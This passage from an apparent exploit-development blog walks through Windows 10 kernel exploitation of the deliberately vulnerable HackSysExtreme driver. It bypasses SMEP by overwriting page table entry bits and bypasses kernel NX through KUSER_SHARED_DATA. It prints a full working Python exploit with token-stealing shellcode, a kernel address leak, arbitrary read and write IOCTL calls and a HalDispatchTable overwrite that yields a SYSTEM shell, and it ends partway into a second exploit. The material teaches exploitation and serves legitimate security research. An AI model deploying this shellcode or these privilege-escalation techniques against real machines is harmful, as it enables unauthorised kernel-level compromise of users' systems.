s.send(http_request)
s.close()

iF wE dIsAbLe cAlC wE wIlL mItIgAtE aLl tHe zEro dAyS

Conclusion

Had to think outside the box with a few of the COP gadgets, but overall this was very fun! Hopefully this was informative and helped out anyone looking to stay away from VirtualProtect() or VirtualAlloc().

Peace, love, and positivity :-)

Exploit Development: Leveraging Page Table Entries for Windows Kernel Exploitation

2 May 2020 at 00:00

Introduction

Taking the prerequisite knowledge from my last blog post, let’s talk about additional ways to bypass SMEP other than flipping the 20th bit of the CR4 register - or completely circumventing SMEP all together by bypassing NX in the kernel! This blog post in particular will leverage page table entry control bits to bypass these kernel mode mitigations, as well as leveraging additional vulnerabilities such as an arbitrary read to bypass page table randomization to achieve said goals.

Before We Begin

Morten Schenk of Offensive Security has done a lot of the leg work for shedding light on this topic to the public, namely at DEF CON 25 and Black Hat 2017.

Although there has been some AMAZING research on this, I have not seen much in the way of practical blog posts showcasing this technique in the wild (that is, taking an exploit start to finish leveraging this technique in a blog post). Most of the research surrounding this topic, although absolutely brilliant, only explains how these mitigation bypasses work. This led to some issues for me when I started applying this research into actual exploitation, as I only had theory to go off of.

Since I had some trouble implementing said research into a practical example, I’m writing this blog post in hopes it will aid those looking for more detail on how to leverage these mitigation bypasses in a practical manner.

This blog post is going to utilize the HackSysExtreme vulnerable kernel driver to outline bypassing SMEP and bypassing NX in the kernel. The vulnerability class will be an arbitrary read/write primitive, which can write one QWORD to kernel mode memory per IOCTL routine.

Thank you to Ashfaq of HackSysTeam for this driver!

In addition to said information, these techniques will be utilized on a Windows 10 64-bit RS1 build. This is because Windows 10 RS2 has kernel Control Flow Guard (kCFG) enabled by default, which is beyond the scope of this post. This post simply aims to show the techniques used in today’s “modern exploitation era” to bypass SMEP or NX in kernel mode memory.

Why Go to the Mountain, If You Can Bring the Mountain to You?

The adage for the title of this section, comes from Spencer Pratt’s WriteProcessMemory() white paper about bypassing DEP. This saying, or adage, is extremely applicable to the method of bypassing SMEP through PTEs.

Let’s start with some psuedo code!

# Allocating user mode code
payload = kernel32.VirtualAlloc(
    c_int(0),                         # lpAddress
    c_int(len(shellcode)),            # dwSize
    c_int(0x3000),                    # flAllocationType
    c_int(0x40)                       # flProtect
)

---------------------------------------------------------

# Grabbing HalDispatchTable + 0x8 address
HalDispatchTable+0x8 = NTBASE + 0xFFFFFF

# Writing payload to HalDispatchTable + 0x8
www.What = payload
www.Where = HalDispatchTable + 0x8

---------------------------------------------------------

# Spawning SYSTEM shell
print "[+] Enjoy the NT AUTHORITY\SYSTEM shell!!!!"
os.system("cmd.exe /K cd C:\\")

Note, the above code is syntactically incorrect, but it is there nonetheless to help us understand what is going on.

Also, before moving on, write-what-where = arbitrary memory overwrite = arbitrary write primitive.

Carrying on, the above psuedo code snippet is allocating virtual memory in user mode, via VirtualAlloc(). Then, utilizing the write-what-where vulnerability in the kernel mode driver, the shellcode’s virtual address (residing in user mode), get’s written to nt!HalDispatchTable+0x8 (residing in kernel mode), which is a very common technique to use in an arbitrary memory overwrite situation.

Please refer to my last post on how this technique works.

As it stands now, execution of this code will result in an ATTEMPTED_EXECUTE_OF_NOEXECUTE_MEMORY Bug Check. This Bug Check is indicative of SMEP kicking in.

Letting the code execute, we can see this is the case.

Here, we can clearly see our shellcode has been allocated at 0x2620000

SMEP kicks in, and we can see the offending address is that of our user mode shellcode (Arg2 of PTE contents is highlighted as well. We will circle back to this in a moment).

Recall, from a previous blog of mine, that SMEP kicks in whenever code that resides in current privilege level (CPL 3) of the CPU (CPL 3 code = user mode code) is executed in context of CPL 0 (kernel mode).

SMEP is triggered in this case, as we are attempting to access the shellcode’s virtual address in user mode from nt!HalDispatchTable+0x8, which is in kernel mode.

But HOW is SMEP implemented is the real question.

SMEP is mandated/enabled through the OS via the 20th bit of the CR4 control register.

The 20th bit in the above image refers to the 1 in the beginning of CR4 register’s value of 0x170678, meaning SMEP is enabled on this system globally.

However, SMEP is ENFORCED on a per memory page basis, via the U/S PTE control bit. This is what we are going shift our focus to in this post.

Alex Ionescu gave a talk at Infiltrate 2015 about the implementation of SMEP on a per page basis.

Citing his slides, he explains that Intel has the following to say about SMEP enforcement on a per page basis.

“Any page level marked as supervisor (U/S=0) will result in treatment as supervisor for SMEP enforcement.”

Let’s take a look at the output of !pte in WinDbg of our user mode shellcode page to make sense of all of this!

What Intel means by the their statement in Alex’s talk, is that only ONE of the paging structure table entries (a page table entry) is needed to be set to kernel, in order for SMEP to not trigger. We do not need all 4 entries to be supervisor (kernel) mode!

This is wonderful for us, from an exploit development standpoint - as this GREATLY reduces our workload (we will see why shortly)!

Let’s learn how we can leverage this new knowledge, by first examining the current PTE control bits of our shellcode page:

  1. D - The “dirty” bit has been set, meaning a write to this address has occurred (KERNELBASE!VirtualAlloc()).
  2. A - The “access” bit has been set, meaning this address has been referenced at some point.
  3. U - The “user” bit has been set here. When the memory manager unit reads in this address, it recognizes is as a user mode address. When this bit is 1, the page is user mode. When this bit is clear, the page is kernel mode.
  4. W - The “write” bit has been set here, meaning this memory page is writable.
  5. E - The “executable” bit has been set here, meaning this memory page is executable.
  6. V - The “valid” bit is set here, meaning that the PTE is a valid PTE.

Notice that most of these control bits were set with our call earlier to KERNELBASE!VirtualAlloc() in the psuedo code snippet via the function’s arguments of flAllocationType and flProtect.

Where Do We Go From Here?

Let’s shift our focus to the PTE entry from the !pte command output in the last screenshot. We can see that our entry is that of a user mode page, from the U/S bit being set. However, what if we cleared this bit out?

If the U/S bit is set to 0, the page should become a kernel mode page, based on the aforementioned information. Let’s investigate this in WinDbg.

Rebooting our machine, we reallocate our shellcode in user mode.

The above image performs the following actions:

  1. Shows our shellcode in a user mode allocation at the virtual address 0xc60000
  2. Shows the current PTE and control bits for our shellcode memory page
  3. Uses ep in WinDbg to overwrite the pointer at 0xFFFFF98000006300 (this is the address of our PTE. When dereferenced, it contains the actual PTE control bits)
  4. Clears the PTE control bit for U/S by subtracting 4 from the PTE control bit contents.

    Note, I found this to be the correct value to clear the U/S bit through trial and error.

After the U/S bit is cleared out, our exploit continues by overwriting nt!HalDispatchTable+0x8 with the pointer to our shellcode.

The exploit continues, with a call to nt!KeQueryIntervalProfile(), which in turn, calls nt!HalDispatchTable+0x8

Stepping into the call qword ptr [nt!HalDispatchTable+0x8] instruction, we have hit our shellcode address and it has been loaded into RIP!

Executing the shellcode, results in manual bypass of SMEP!

Let’s refer back to the phraseology earlier in the post that uttered:

Why go to the mountain, if you can bring the mountain to you?

Notice how we didn’t “disable” SMEP like we did a few blog posts ago with ROP. All we did this time was just play by SMEP’s rules! We didn’t go to SMEP and try to disable it, instead, we brought our shellcode to SMEP and said “treat this as you normally treat kernel mode memory.”

This is great, we know we can bypass SMEP through this method! But the question remains, how can we achieve this dynamically?

After all, we cannot just arbitrarily use WinDbg when exploiting other systems.

Calculating PTEs

The previously shown method of bypassing SMEP manually in WinDbg revolved around the fact we could dereference the PTE address of our shellcode page in memory and extract the control bits. The question now remains, can we do this dynamically without a debugger?

Our exploit not only gives us the ability to arbitrarily write, but it gives us the ability to arbitrarily read in data as well! We will be using this read primitive to our advantage.

Windows has an API for just about anything! Fetching the PTE for an associated virtual address is no different. Windows has an API called nt!MiGetPteAddress that performs a specific formula to retrieve the associated PTE of a memory page.

The above function performs the following instructions:

  1. Bitwise shifts the contents of the RCX register to the right by 9 bits
  2. Moves the value of 0x7FFFFFFFF8 into RAX
  3. Bitwise AND’s the values of RCX and RAX together
  4. Moves the value of 0xFFFFFE0000000000 into RAX
  5. Adds the values of RAX and RCX
  6. Performs a return out of the function

Let’s take a second to break this down by importance. First things first, the number 0xFFFFFE0000000000 looks like it could potentially be important - as it resembles a 64-bit virtual memory address.

Turns out, this is important. This number is actually a memory address, and it is the base address of all of the PTEs! Let’s talk about the base of the PTEs for a second and its significance.

Rebooting the machine and disassembling the function again, we notice something.

0xFFFFFE0000000000 has now changed to 0xFFFF800000000000. The base of the PTEs has changed, it seems.

This is due to page table randomization, a mitigation of Windows 10. Microsoft definitely had the right idea to implement this mitigation, but it is not much of a use to be honest if the attacker already has an abitrary read primitive.

An attacker needs an arbitrary read primitive in the first place to extract the contents of the PTE control bits by dereferencing the PTE of a given memory page.

If an attacker already has this ability, the adversary could just use the same primitive to read in nt!MiGetPteAddress+0x13, which, when dereferenced, contains the base of the PTEs.

Again, not ripping on Microsoft - I think they honestly have some of the best default OS exploit mitigations in the business. Just something I thought of.

The method of reusing an arbitrary read primitive is actually what we are going to do here! But before we do, let’s talk about the PTE formula one last time.

As we saw, a bitwise shift right operation is performed on the contents of the RCX register. That is because when this function is called, the virtual address for the PTE you would like to fetch gets loaded into RCX.

We can mimic this same behavior in Python also!

# Bitwise shift shellcode virtual address to the right 9 bits
shellcode_pte = shellcode_virtual_address >> 9

# Bitwise AND the bitwise shifted right shellcode virtual address with 0x7ffffffff8
shellcode_pte &= 0x7ffffffff8

# Add the base of the PTEs to the above value (which will need to be previously extracted with an arbitrary read)
shellcode_pte += base_of_ptes

The variable shellcode_pte will now contain the PTE for our shellcode page! We can demonstrate this behavior in WinDbg.

Sorry for the poor screenshot above in advance.

But as we can see, our version of the formula works - and we know can now dynamically fetch a PTE address! The only question remains, how do we dynamically dereference nt!MiGetPteAddress+0x13 with an arbitrary read?

Read, Read, Read!

To use our arbitrary read, we are actually going to use our arbitrary write!

Our write-what-where primitive allows us to write a pointer (the what) to a pointer (the where). The school of thought here, is to write the address of nt!MiGetPteAddress+0x13 (the what) to a c_void_p() data type, which is Python’s representation of a C void pointer.

What will happen here is the following:

  1. Since the write portion of the write-what-where writes a POINTER (a.k.a the write will take a memory address and dereference it - which results in extracting the contents of a pointer), we will write the value of nt!MiGetPteAddress+0x13 somewhere we control. The write primitive will extract what nt!MiGetPteAddress+0x13 points to, which is the base of the PTEs, and write it somewhere we can fetch the result!
  2. The “where” value in the write-what-were vulnerability will write the “what” value (base of the PTEs) to a pointer (a.k.a if the “what” value (base of the PTEs) gets written to 0xFFFFFFFFFFFFFFFF, that means 0xFFFFFFFFFFFFFFFF will now POINT to the “what” value, which is the base of the PTEs).

The thought process here is, if we write the base of the PTEs to OUR OWN pointer that we create - we can then dereference our pointer and extract the contents ourselves!

Here is how this all looks in Python!

First, we declare a structure (one member for the “what” value, one member for the “where” value)

# Fist structure, for obtaining nt!MiGetPteAddress+0x13 value
class WriteWhatWhere_PTE_Base(Structure):
    _fields_ = [
        ("What_PTE_Base", c_void_p),
        ("Where_PTE_Base", c_void_p)
    ]

Secondly, we fetch the memory address of nt!MiGetPteAddress+0x13

Note - your offset from the kernel base to this function may be different!

# Retrieving nt!MiGetPteAddress (Windows 10 RS1 offset)
nt_mi_get_pte_address = kernel_address + 0x51214

# Base of PTEs is located at nt!MiGetPteAddress + 0x13
pte_base = nt_mi_get_pte_address + 0x13

Thirdly, we declare a c_void_p() to store the value pointed to by nt!MiGetPteAddress+0x13

# Creating a pointer in which the contents of nt!MiGetPteAddress+0x13 will be stored in to
# Base of the PTEs are stored here
base_of_ptes_pointer = c_void_p()

Fourthly, we initialize our structure with our “what” value and our “where” value which writes what the actual address of nt!MiGetPteAddress+0x13 points to (the base of the PTEs) into our declared pointer.

# Write-what-where structure #1
www_pte_base = WriteWhatWhere_PTE_Base()
www_pte_base.What_PTE_Base = pte_base
www_pte_base.Where_PTE_Base = addressof(base_of_ptes_pointer)
www_pte_pointer = pointer(www_pte_base)

Notice the where is the address of the pointer addressof(base_of_ptes_pointer). This is because we don’t want to overwrite the c_void_p’s address with anything - we want to store the value inside of the pointer.

This will store the value inside of the pointer because our write-what-where primitive writes a “what” value to a pointer.

Next, we make an IOCTL call to the routine that jumps to the arbitrary write in the driver.

# 0x002200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_pte_pointer,                    # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

A little Python ctypes magic here on dereferencing pointers.

# CTypes way of dereferencing a C void pointer
base_of_ptes = struct.unpack('<Q', base_of_ptes_pointer)[0]

The above snippet of code will read in the c_void_p() (which contains the base of the PTEs) and store it in the variable base_of_ptes.

Utilizing the base of the PTEs, we can now dynamically retrieve the location of our shellcode’s PTE by putting all of the code together!

We have successfully defeated page table randomization!

Read, Read, Read… Again!

Now that we have dynamically resolved the PTE address for our shellcode, we need to use our arbitrary read again to dereference the shellcode’s PTE and extract the PTE control bits so we can modify the page table entry to be kernel mode.

Using the same primitive as above, we can use Python again to dynamically retrieve all of this!

Firstly, we need to create another structure (again, one member for “what” and one member for “where”).

# Second structure, for obtaining the control bits for the PTE
class WriteWhatWhere_PTE_Control_Bits(Structure):
    _fields_ = [
        ("What_PTE_Control_Bits", c_void_p),
        ("Where_PTE_Control_Bits", c_void_p)
    ]

Secondly, we declare another c_void_p.

shellcode_pte_bits_pointer = c_void_p()

Thirdly, we initialize our structure with the appropriate variables

# Write-what-where structure #2
www_pte_bits = WriteWhatWhere_PTE_Control_Bits()
www_pte_bits.What_PTE_Control_Bits = shellcode_pte
www_pte_bits.Where_PTE_Control_Bits = addressof(shellcode_pte_bits_pointer)
www_pte_bits_pointer = pointer(www_pte_bits)

We then make another call to the IOCTL responsible for the vulnerability.

Before executing our updated exploit, let’s restart the computer to prove everything is working dynamically.

Our combined code executes - resulting in the extraction of the PTE control bits!

Awesome! All that is left now that is to modify the U/S bit of the PTE control bits and then execute our shellcode!

Write, Write, Write!

Now that we have read in all of the information we need, it is time to modify the PTE of the shellcode memory page. To do this, all we need to do is subtract the extracted PTE control bits by 4.

# Currently, the PTE control bit for U/S of the shellcode is that of a user mode memory page
# Flipping the U (user) bit to an S (supervisor/kernel) bit
shellcode_pte_control_bits_kernelmode = shellcode_pte_control_bits_usermode - 4

Now we have successfully gotten the value we would like to write over our current PTE, it is time to actually make the write.

To do this, we first setup a structure, just like the read primitive.

# Third structure, to overwrite the U (user) PTE control bit to an S (supervisor/kernel) bit
class WriteWhatWhere_PTE_Overwrite(Structure):
    _fields_ = [
        ("What_PTE_Overwrite", c_void_p),
        ("Where_PTE_Overwrite", c_void_p)
    ]

This time, however, we store the PTE bits in a pointer so when the write occurs, it writes the bits instead of trying to extract the memory address of 2000000046b0f867 - which is not a valid address.

# Need to store the PTE control bits as a pointer
# Using addressof(pte_overwrite_pointer) in Write-what-where structure #4 since a pointer to the PTE control bits are needed
pte_overwrite_pointer = c_void_p(shellcode_pte_control_bits_kernelmode)

Then, we initialize the structure again.

# Write-what-where structure #4
www_pte_overwrite = WriteWhatWhere_PTE_Overwrite()
www_pte_overwrite.What_PTE_Overwrite = addressof(pte_overwrite_pointer)
www_pte_overwrite.Where_PTE_Overwrite = shellcode_pte
www_pte_overwrite_pointer = pointer(www_pte_overwrite)

After everything is good to go, we make another IOCTL call to trigger the vulnerability, and we successfully turn our user mode page into a kernel mode page dynamically!

Goodbye, SMEP (v2 ft. PTE Overwrite)!

All that is left to do now is execute our shellcode via nt!HalDispatchTable+0x8 and nt!KeQueryIntervalProfile(). Since I have already done a post outlining how this works, I will link you to it so you can see how this actually executes our shellcode. This blog post assumes the reader has minimal knowledge of arbitrary memory overwrites to begin with.

Here is the final exploit, which can also be found on my GitHub.

# HackSysExtreme Vulnerable Driver Kernel Exploit (x64 Arbitrary Overwrite/SMEP Enabled)
# Windows 10 RS1 - SMEP Bypass via PTE Overwrite
# Author: Connor McGarr

import struct
import sys
import os
from ctypes import *

kernel32 = windll.kernel32
ntdll = windll.ntdll
psapi = windll.Psapi

# Fist structure, for obtaining nt!MiGetPteAddress+0x13 value
class WriteWhatWhere_PTE_Base(Structure):
    _fields_ = [
        ("What_PTE_Base", c_void_p),
        ("Where_PTE_Base", c_void_p)
    ]

# Second structure, for obtaining the control bits for the PTE
class WriteWhatWhere_PTE_Control_Bits(Structure):
    _fields_ = [
        ("What_PTE_Control_Bits", c_void_p),
        ("Where_PTE_Control_Bits", c_void_p)
    ]

# Third structure, to overwrite the U (user) PTE control bit to an S (supervisor/kernel) bit
class WriteWhatWhere_PTE_Overwrite(Structure):
    _fields_ = [
        ("What_PTE_Overwrite", c_void_p),
        ("Where_PTE_Overwrite", c_void_p)
    ]

# Fourth structure, to overwrite HalDispatchTable + 0x8 with kernel mode shellcode page
class WriteWhatWhere(Structure):
    _fields_ = [
        ("What", c_void_p),
        ("Where", c_void_p)
    ]

# Token stealing payload
payload = bytearray(
    "\x65\x48\x8B\x04\x25\x88\x01\x00\x00"              # mov rax,[gs:0x188]  ; Current thread (KTHREAD)
    "\x48\x8B\x80\xB8\x00\x00\x00"                      # mov rax,[rax+0xb8]  ; Current process (EPROCESS)
    "\x48\x89\xC3"                                      # mov rbx,rax         ; Copy current process to rbx
    "\x48\x8B\x9B\xF0\x02\x00\x00"                      # mov rbx,[rbx+0x2f0] ; ActiveProcessLinks
    "\x48\x81\xEB\xF0\x02\x00\x00"                      # sub rbx,0x2f0       ; Go back to current process
    "\x48\x8B\x8B\xE8\x02\x00\x00"                      # mov rcx,[rbx+0x2e8] ; UniqueProcessId (PID)
    "\x48\x83\xF9\x04"                                  # cmp rcx,byte +0x4   ; Compare PID to SYSTEM PID
    "\x75\xE5"                                          # jnz 0x13            ; Loop until SYSTEM PID is found
    "\x48\x8B\x8B\x58\x03\x00\x00"                      # mov rcx,[rbx+0x358] ; SYSTEM token is @ offset _EPROCESS + 0x358
    "\x80\xE1\xF0"                                      # and cl, 0xf0        ; Clear out _EX_FAST_REF RefCnt
    "\x48\x89\x88\x58\x03\x00\x00"                      # mov [rax+0x358],rcx ; Copy SYSTEM token to current process
    "\x48\x31\xC0"                                      # xor rax,rax         ; set NTSTATUS SUCCESS
    "\xC3"                                              # ret                 ; Done!
)

# Defeating DEP with VirtualAlloc. Creating RWX memory, and copying the shellcode in that region.
print "[+] Allocating RWX region for shellcode"
ptr = kernel32.VirtualAlloc(
    c_int(0),                         # lpAddress
    c_int(len(payload)),              # dwSize
    c_int(0x3000),                    # flAllocationType
    c_int(0x40)                       # flProtect
)

# Creates a ctype variant of the payload (from_buffer)
c_type_buffer = (c_char * len(payload)).from_buffer(payload)

print "[+] Copying shellcode to newly allocated RWX region"
kernel32.RtlMoveMemory(
    c_int(ptr),                       # Destination (pointer)
    c_type_buffer,                    # Source (pointer)
    c_int(len(payload))               # Length
)

# Print update statement for shellcode location
print "[+] Shellcode is located at {0}".format(hex(ptr))

# Creating a pointer for the shellcode (write-what-where writes a pointer to a pointer)
# Using addressof(shellcode_pointer) in Write-what-where structure #5
shellcode_pointer = c_void_p(ptr)

# c_ulonglong because of x64 size (unsigned __int64)
base = (c_ulonglong * 1024)()

print "[+] Calling EnumDeviceDrivers()..."
get_drivers = psapi.EnumDeviceDrivers(
    byref(base),                      # lpImageBase (array that receives list of addresses)
    sizeof(base),                     # cb (size of lpImageBase array, in bytes)
    byref(c_long())                   # lpcbNeeded (bytes returned in the array)
)

# Error handling if function fails
if not base:
    print "[+] EnumDeviceDrivers() function call failed!"
    sys.exit(-1)

# The first entry in the array with device drivers is ntoskrnl base address
kernel_address = base[0]

# Print update for ntoskrnl.exe base address
print "[+] Found kernel leak!"
print "[+] ntoskrnl.exe base address: {0}".format(hex(kernel_address))

# Phase 1: Grab the base of the PTEs via nt!MiGetPteAddress

# Retrieving nt!MiGetPteAddress (Windows 10 RS1 offset)
nt_mi_get_pte_address = kernel_address + 0x51214

# Print update for nt!MiGetPteAddress address 
print "[+] nt!MiGetPteAddress is located at: {0}".format(hex(nt_mi_get_pte_address))

# Base of PTEs is located at nt!MiGetPteAddress + 0x13
pte_base = nt_mi_get_pte_address + 0x13

# Print update for nt!MiGetPteAddress+0x13 address
print "[+] nt!MiGetPteAddress+0x13 is located at: {0}".format(hex(pte_base))

# Creating a pointer in which the contents of nt!MiGetPteAddress+0x13 will be stored in to
# Base of the PTEs are stored here
base_of_ptes_pointer = c_void_p()

# Write-what-where structure #1
www_pte_base = WriteWhatWhere_PTE_Base()
www_pte_base.What_PTE_Base = pte_base
www_pte_base.Where_PTE_Base = addressof(base_of_ptes_pointer)
www_pte_pointer = pointer(www_pte_base)

# Getting handle to driver to return to DeviceIoControl() function
handle = kernel32.CreateFileA(
    "\\\\.\\HackSysExtremeVulnerableDriver", # lpFileName
    0xC0000000,                         # dwDesiredAccess
    0,                                  # dwShareMode
    None,                               # lpSecurityAttributes
    0x3,                                # dwCreationDisposition
    0,                                  # dwFlagsAndAttributes
    None                                # hTemplateFile
)

# 0x002200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_pte_pointer,                    # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

# CTypes way of dereferencing a C void pointer
base_of_ptes = struct.unpack('<Q', base_of_ptes_pointer)[0]

# Print update for PTE base
print "[+] Leaked base of PTEs!"
print "[+] Base of PTEs are located at: {0}".format(hex(base_of_ptes))

# Phase 2: Calculate the shellcode's PTE address

# Calculating the PTE for shellcode memory page
shellcode_pte = ptr >> 9
shellcode_pte &= 0x7ffffffff8
shellcode_pte += base_of_ptes

# Print update for Shellcode PTE
print "[+] PTE for the shellcode memory page is located at {0}".format(hex(shellcode_pte))

# Phase 3: Extract shellcode's PTE control bits

# Declaring C void pointer to store shellcode PTE control bits
shellcode_pte_bits_pointer = c_void_p()

# Write-what-where structure #2
www_pte_bits = WriteWhatWhere_PTE_Control_Bits()
www_pte_bits.What_PTE_Control_Bits = shellcode_pte
www_pte_bits.Where_PTE_Control_Bits = addressof(shellcode_pte_bits_pointer)
www_pte_bits_pointer = pointer(www_pte_bits)

# 0x002200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_pte_bits_pointer,               # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

# CTypes way of dereferencing a C void pointer
shellcode_pte_control_bits_usermode = struct.unpack('<Q', shellcode_pte_bits_pointer)[0]

# Print update for PTE control bits
print "[+] PTE control bits for shellcode memory page: {:016x}".format(shellcode_pte_control_bits_usermode)

# Phase 4: Overwrite current PTE U/S bit for shellcode page with an S (supervisor/kernel)

# Currently, the PTE control bit for U/S of the shellcode is that of a user mode memory page
# Flipping the U (user) bit to an S (supervisor/kernel) bit
shellcode_pte_control_bits_kernelmode = shellcode_pte_control_bits_usermode - 4

# Need to store the PTE control bits as a pointer
# Using addressof(pte_overwrite_pointer) in Write-what-where structure #4 since a pointer to the PTE control bits are needed
pte_overwrite_pointer = c_void_p(shellcode_pte_control_bits_kernelmode)

# Write-what-where structure #4
www_pte_overwrite = WriteWhatWhere_PTE_Overwrite()
www_pte_overwrite.What_PTE_Overwrite = addressof(pte_overwrite_pointer)
www_pte_overwrite.Where_PTE_Overwrite = shellcode_pte
www_pte_overwrite_pointer = pointer(www_pte_overwrite)

# Print update for PTE overwrite
print "[+] Goodbye SMEP..."
print "[+] Overwriting shellcodes PTE user control bit with a supervisor control bit..."

# 0x002200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_pte_overwrite_pointer,          # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

# Print update for PTE overwrite round 2
print "[+] User mode shellcode page is now a kernel mode page!"

# Phase 5: Shellcode

# nt!HalDispatchTable address (Windows 10 RS1 offset)
haldispatchtable_base_address = kernel_address + 0x2f1330

# nt!HalDispatchTable + 0x8 address
haldispatchtable = haldispatchtable_base_address + 0x8

# Print update for nt!HalDispatchTable + 0x8
print "[+] nt!HalDispatchTable + 0x8 is located at: {0}".format(hex(haldispatchtable))

# Write-what-where structure #5
www = WriteWhatWhere()
www.What = addressof(shellcode_pointer)
www.Where = haldispatchtable
www_pointer = pointer(www)

# 0x002200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
print "[+] Interacting with the driver..."
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_pointer,                        # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

# Actually calling NtQueryIntervalProfile function, which will call HalDispatchTable + 0x8, where the shellcode will be waiting.
ntdll.NtQueryIntervalProfile(
    0x1234,
    byref(c_ulonglong())
)

# Print update for shell
print "[+] Enjoy the NT AUTHORITY\SYSTEM shell!"
os.system("cmd.exe /K cd C:\\")

NT AUTHORITY\SYSTEM!

Rinse and Repeat

Did you think I forgot about you, kernel no-execute (NX)?

Let’s say that for some reason, you are against the method of allocating user mode code. There are many reasons for that, one of them being EDR hooking of crucial functions like VirtualAlloc().

Let’s say you want to take advantage of various defensive tools and their lack of visibility into kernel mode. How can we leverage already existing kernel mode memory in the same manner?

Okay, This Time We Are Going To The Mountain! KUSER_SHARED_DATA Time!

Morten in his research suggests that another suitable method may be to utilize the KUSER_SHARED_DATA structure in the kernel directly, similarly to how ROP works in user mode.

The concept of ROP in user mode is the idea that we have the ability to write shellcode to the stack, we just don’t have the ability to execute it. Using ROP, we can change the permissions of the stack to that of executable, and execute our shellcode from there.

The concept here is no different. We can write our shellcode to KUSER_SHARED_DATA+0x800, because it is a kernel mode page with writeable permissions.

Using our write and read primtives, we can then flip the NX bit (similar to ROP in user mode) and make the kernel mode memory executable!

The questions still remains, why KUSER_SHARED_DATA?

Static Electricity

Windows has slowly but surely dried up all of the static addresses used by exploit developers over the years. One of the last structures that many people used for kASLR bypasses, was the lack of randomization of the HAL heap. The HAL heap used to contain a pointer to the kernel AND be static, but no longer is static.

Although everything is dynamically based, there is still a structure that remains which is static, KUSER_SHARED_DATA.

This structure, according to Geoff Chappell, is used to define the layout of data that the kernel shares with user mode.

The issue is, this structure is static at the address 0xFFFFF78000000000!

What is even more interesting, is that KUSER_SHARED_DATA+0x800 seems to just be a code cave of non-executable kernel mode memory which is writeable!

How Do We Leverage This?

Our arbitrary write primitive only allows us to write one QWORD of data at a time (8 bytes). My thought process here is to:

  1. Break up the 67 byte shellcode into 8 byte pieces and compensate any odd numbering with NULL bytes.
  2. Write each line of shellcode to KUSER_SHARED_DATA+0x800, KUSER_SHARED_DATA+0x808,KUSER_SHARED_DATA+0x810, etc.
  3. Use the same read primitive to bypass page table randomization and obtain PTE control bits of KUSER_SHARED_DATA+0x800.
  4. Make KUSER_SHARED_DATA+0x800 executable by overwriting the PTE.
  5. NT AUTHORITY\SYSTEM

Before we begin, the steps about obtaining the contents of nt!MiGetPteAddress+0x13 and extracting the PTE control bits will be left out in this portion of the blog, as they have already been explained in the beginning of this post!

Moving on, let’s start with each line of shellcode.

For each line written the data type chosen was that of a c_ulonglong() - as it was easy to store into a c_void_p.

The first line of shellcode had an associated structure as shown below.

class WriteWhatWhere_Shellcode_1(Structure):
    _fields_ = [
        ("What_Shellcode_1", c_void_p),
        ("Where_Shellcode_1", c_void_p)
    ]

Shellcode is declared as a c_ulonglong().

# Using just long long integer, because only writing opcodes.
first_shellcode = c_ulonglong(0x00018825048B4865)

The shellcode is then written to KUSER_SHARED_DATA+0x800 through the previously created structure.

www_shellcode_one = WriteWhatWhere_Shellcode_1()
www_shellcode_one.What_Shellcode_1 = addressof(first_shellcode)
www_shellcode_one.Where_Shellcode_1 = KUSER_SHARED_DATA + 0x800
www_shellcode_one_pointer = pointer(www_shellcode_one)

This same process was repeated 9 times, until all of the shellcode was written.

As you can see in the image below, the shellcode was successfully written to KUSER_SHARED_DATA+0x800 due to the writeable PTE control bit of this structure.

Executable, Please!

Using the same arbitrary read primitives as earlier, we can extract the PTE control bits of KUSER_SHARED_DATA+0x800’s memory page. This time, however, instead of subtracting 4 - we are going to use bitwise AND per Morten’s research.

# Setting KUSER_SHARED_DATA + 0x800 to executable
pte_control_bits_execute= pte_control_bits_no_execute & 0x0FFFFFFFFFFFFFFF

We can see that dynamically, we can set KUSER_SHARED_DATA+0x800 to executable memory, giving us a nice big executable kernel memory region!

All that is left to do now, is overwrite the nt!HalDispatchTable+0x8 with the address of KUSER_SHARED_DATA+0x800 and nt!KeQueryIntervalProfile() will take care of the rest!

This exploit can also be found on my GitHub, but here it is if you do not feel like heading over there:

# HackSysExtreme Vulnerable Driver Kernel Exploit (x64 Arbitrary Overwrite/SMEP Enabled)
# KUSER_SHARED_DATA + 0x800 overwrite
# Windows 10 RS1
# Author: Connor McGarr

import struct
import sys
import os
from ctypes import *

kernel32 = windll.kernel32
ntdll = windll.ntdll
psapi = windll.Psapi

# Defining KUSER_SHARED_DATA
KUSER_SHARED_DATA = 0xFFFFF78000000000

# First structure, for obtaining nt!MiGetPteAddress+0x13 value
class WriteWhatWhere_PTE_Base(Structure):
    _fields_ = [
        ("What_PTE_Base", c_void_p),
        ("Where_PTE_Base", c_void_p)
    ]

# Second structure, first 8 bytes of shellcode to be written to KUSER_SHARED_DATA + 0x800
class WriteWhatWhere_Shellcode_1(Structure):
    _fields_ = [
        ("What_Shellcode_1", c_void_p),
        ("Where_Shellcode_1", c_void_p)
    ]

# Third structure, next 8 bytes of shellcode to be written to KUSER_SHARED_DATA + 0x800
